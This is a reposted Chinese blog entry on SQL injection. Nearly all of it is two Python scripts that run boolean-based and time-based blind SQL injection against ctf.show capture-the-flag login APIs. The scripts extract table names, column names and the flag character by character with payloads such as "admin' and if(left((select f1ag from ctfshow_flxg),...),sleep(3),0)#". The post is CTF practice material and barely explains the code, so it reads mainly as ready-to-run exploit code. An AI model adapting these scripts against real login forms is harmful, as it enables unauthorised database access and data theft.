SQL注入-2
作者:互联网
简单盲注
import requests
import time
result = ""
url = 'http://986b6ffa-086c-4650-8237-9557e9bd100c.challenge.ctf.show/api/'
for i in range(80):
min_num = 32
max_num = 127
while True:
mid_num = (min_num + max_num) >> 1
if mid_num == min_num:
result += chr(mid_num)
print(result)
break
# table_name = ctfshow_fl0g,ctfshow_user
# column_name = id,f1ag
# payload = "admin' and ascii(substr((select group_concat(column_name)from information_schema.columns where table_schema='ctfshow_web' and table_name='ctfshow_user'),{},1))<{}#".format(i, mid_num)
payload = "admin' and ascii(substr((select f1ag from ctfshow_fl0g),{},1))<{}#".format(i, mid_num)
data = {
'username': payload,
'password': 0
}
response = requests.post(url, data=data)
time.sleep(0.25)
if response.text.find('8bef') > 0:
max_num = mid_num
else:
min_num = mid_num
简单时间盲注
import requests
import time
dic = ' ,ctfshow{}abdegijklmnpqruvxyz0123456789-_{}ABCDEFGHIJKLMNOPQRSTUVWXYZ'
url = 'http://414da80d-977f-4f64-baf7-5a7adbebb60a.challenge.ctf.show/api/'
result = ''
for i in range(1, 60):
for word in dic:
# payload = "admin' and if(left(database(),{0})='{1}',sleep(3),0)#".format(i, result + word)
# payload = "admin' and if(left((select group_concat(table_name) from information_schema.tables where table_schema='ctfshow_web'),{0})='{1}',sleep(3),0)#".format(i, result + word)
# payload = "admin' and if(left((select group_concat(column_name) from information_schema.columns where table_schema='ctfshow_web' and table_name='ctfshow_flxg'),{})='{}',sleep(3),0)#".format(i, result + word)
payload = "admin' and if(left((select f1ag from ctfshow_flxg),{})='{}',sleep(3),0)#".format(i, result + word)
data = {
'username': payload,
'password': 0
}
try:
response = requests.post(url, data=data, timeout=2.5)
time.sleep(0.25)
except:
result += word
print(result)
break
标签:result,name,num,ctfshow,SQL,table,schema,注入 来源: https://www.cnblogs.com/amazingman113/p/16101033.html